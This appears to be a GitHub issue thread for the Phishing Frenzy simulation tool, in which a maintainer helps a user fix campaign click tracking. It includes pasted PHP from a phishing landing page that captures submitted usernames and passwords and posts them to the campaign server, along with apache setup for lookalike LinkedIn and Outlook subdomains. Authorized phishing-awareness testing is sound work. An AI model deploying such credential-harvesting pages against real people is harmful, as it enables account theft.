Stats Tracking Stopped Working

[tj94]

Everything was working, using the templates in github - office365, linkedIn. Though the office365 template had issues but were resolved. However, i tried to change the PF login password - it took me a weird page stating URL not - contact your administrator, after going back a couple of windows. everything was back on - PF started working again. Then i changed the email settings in one of the campaigns, sent phishing emails again - for test, realized it was not tracking stats. Now, no stats works for any campaign.. Please help how to resolve.

[zeknox]

Did you happen to change the url / fqdn that you use to access the pf interface? make sure that the "site url" within global settings is accurate to what url you use to access pf.

[tj94]

Nothing changed. Except i forgot to tell that i created a same campaign again with the same information, feels like that broke and so i deleted that campaign

[tj94]

The site url is same, nothing changed it that, as for the fact that it is same as what is used to access PF interface. Thanks for the help

[zeknox]

thats likely your problem. You can't have 2 campaigns with the exact fqdn. What happens is that only one of the campaigns will be able to collect stats because apache can only serve up one phishing site at a time per fqdn.

[tj94]

Hey, well i figured that out the hard way, but that campaign was deleted then, now there are two different campaigns with different FQDN - stats still don't work, anything that i need to delete or whatever please help thanks

[tj94]

i have created a new campaign, and deleted the old one and still it isn't tracking the stats Brandon. Your help is really appreciated, any answers to this last question, would be great!!!

[zeknox]

First walk through this troubleshooting steps to see if you can manually create a click event: https://www.phishingfrenzy.com/resources/troubleshooting

[tj94]

yes, the click event can be triggered manually, have tried that.

[zeknox]

Run apachectl -S and make sure that there are no unique FQDNs. The tracking API is working properly, you just need to figure out why clicks arn't being sent to the API properly.

[tj94]

apachectl -S VirtualHost configuration: *:80 is a NameVirtualHost default server phishingfrenzy.local (/etc/apache2/pf.conf:6) port 80 namevhost phishingfrenzy.local (/etc/apache2/pf.conf:6) port 80 namevhost PhishingFrenzy.local (/etc/apache2/sites-enabled/000-default.conf:1) port 80 namevhost outlook.defendcontent.com (/etc/apache2/sites-enabled/6.conf:2) alias outlook.defendcontent.com port 80 namevhost linkedin.defendcontent.com (/etc/apache2/sites-enabled/8.conf:2) alias linkedin.defendcontent.com ServerRoot: "/etc/apache2" Main DocumentRoot: "/var/www" Main ErrorLog: "/var/log/apache2/error.log" Mutex watchdog-callback: using_defaults Mutex ssl-stapling: using_defaults Mutex ssl-cache: using_defaults Mutex default: dir="/var/lock/apache2" mechanism=fcntl Mutex mpm-accept: using_defaults PidFile: "/var/run/apache2/apache2.pid" Define: DUMP_VHOSTS Define: DUMP_RUN_CFG User: name="www-data" id=33 Group: name="www-data" id=33

This is what it looks like

[zeknox]

So phishingfrenzy.local needs to be able to resolve on all the targets which click on the link. Do you have DNS or some other way that targets are able to resolve this to an IP address?

[tj94]

We have bought a domain - defendcontent.com - used to resolve to the PF box per say - I use goeasy.defendcontent.com to get into the PF interface. And all the subdomain like - linkedin.defendcontent.com have been created with A record

[zeknox]

Ok, so you are using a valid domain with proper resolution. One thing to check is what the actual url is within the phishing site itself. So you can see what directoryroot is configured within the 6.conf for example and look at your index.php file.

on the top portion of the file look at the PHP tags and see if the URL is lining up properly to your PF interface.

[tj94]

Begining looks like this <?php // Turn off all error reporting error_reporting(0);

if (isset($_GET['uid'])) { $uid = $_GET['uid']; } else { header('404 Not Found', true, 404); echo "404 Page Not Found"; exit(); }

function get_ip() { if (function_exists('apache_request_headers')) { $headers = apache_request_headers(); } else { $headers = $_SERVER; }

[zeknox]

This is the specific line we are interested in. https://github.com/pentestgeek/phishing-frenzy/blob/master/app/views/reports/tags.txt.erb#L39

What you posted above isn't what we need.

[tj94]

Here...

function get_ip() { if (function_exists('apache_request_headers')) { $headers = apache_request_headers(); } else { $headers = $_SERVER; } if (array_key_exists('X-Forwarded-For',$headers) && filter_var($headers['X-Forwarded-For'],FILTER_VALIDATE_IP,FILTER_FLAG_IPV4)) { $the_ip = $headers['X-Forwarded-For']; } elseif (array_key_exists('HTTP_X_FORWARDED_FOR',$headers) && filter_var($headers['HTTP_X_FORWARDED_FOR'],FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) { $the_ip = $headers['HTTP_X_FORWARDED_FOR']; } else { $the_ip = filter_var($_SERVER['REMOTE_ADDR'],FILTER_VALIDATE_IP,FILTER_FLAG_IPV4); } return $the_ip; }

$password = htmlspecialchars($_POST['PasswordForm']); $username = htmlspecialchars($_POST['UsernameForm']);

if ($password != '') { $creds = 'user:' . $username . ' password:' . $password; }

$ip = get_ip(); $browser = $_SERVER['HTTP_USER_AGENT']; $host = $_SERVER['HTTP_HOST']; $url = "http://goeasy.defendcontent.com" . '/reports/results/'; $data = array('uid' => $uid, 'browser_info' => $browser, 'ip_address' => $ip, 'extra' => $creds);

// use key 'http' even if you send the request to https://... $options = array( 'http' => array( 'header' => 'Content-type: application/x-www-form-urlencoded', 'method' => 'POST', 'content' => http_build_query($data), ), ); $context = stream_context_create($options); $result = file_get_contents($url, false, $context); ?>

[zeknox]

If you said you tested a track event manually by using this FQDN http://goeasy.defendcontent.com/reports/results/ then everything should be working. The only thing I can think of is monitoring your PF logs while invoking the click to the phishing site. Logs would be located at /var/www/phishing-frenzy/logs/production.log if your running your app in production mode.

[tj94]

OK here is the thing, if i type this http://goeasy.defendcontent.com/reports/results/?uid:UKIBFVKI in the address , it should trigger the event, well it is not, now it just displays "start," in the top left corner and that is it i manually triggered the event using phishingfrenzy.local earlier, my bad

thanks for all your help

[zeknox]

I believe start is normal, however it requires like the user-agent and some other parameters as stated in the documentation to actually log it properly.

[zeknox]

Also it should be ?uid=UKIBFVKI

[zeknox]

Perhaps that is your issue with requiring specific IP addresses? You see the targets need to be able to access your PF API which is used as a callback to send tracking analytic data. If you are locking down that FQDN to only certain IP addresses that could be your issue.

[tj94]

Hey, being a rookie in linux, i stopped apache and then started it (just wanted to see if that will help as well - as i deleted the requiring specific ip stuff from pf.conf - it didn't work now all i see is apache page - no pF interface

[zeknox]

Look at the result of apachectl -S, it sounds like it's serving up the virtual host 000-default.conf

[tj94]

Hey, got it back...thanks for the reply -- -got everything working back....

thanks for the help!!!! and prompt reply!

[zeknox]

I still feel that you restricting the IP addresses within apache to the PF interface is what is not allowing stats to track properly. Again, look at the application logs when you click on the phishing email and see what is happening.

[tj94]

now you can close the ticket and like i said in the last post ....thanks for the help and the prompt reply...:)

[zeknox]

no problem, hope you get it sorted out.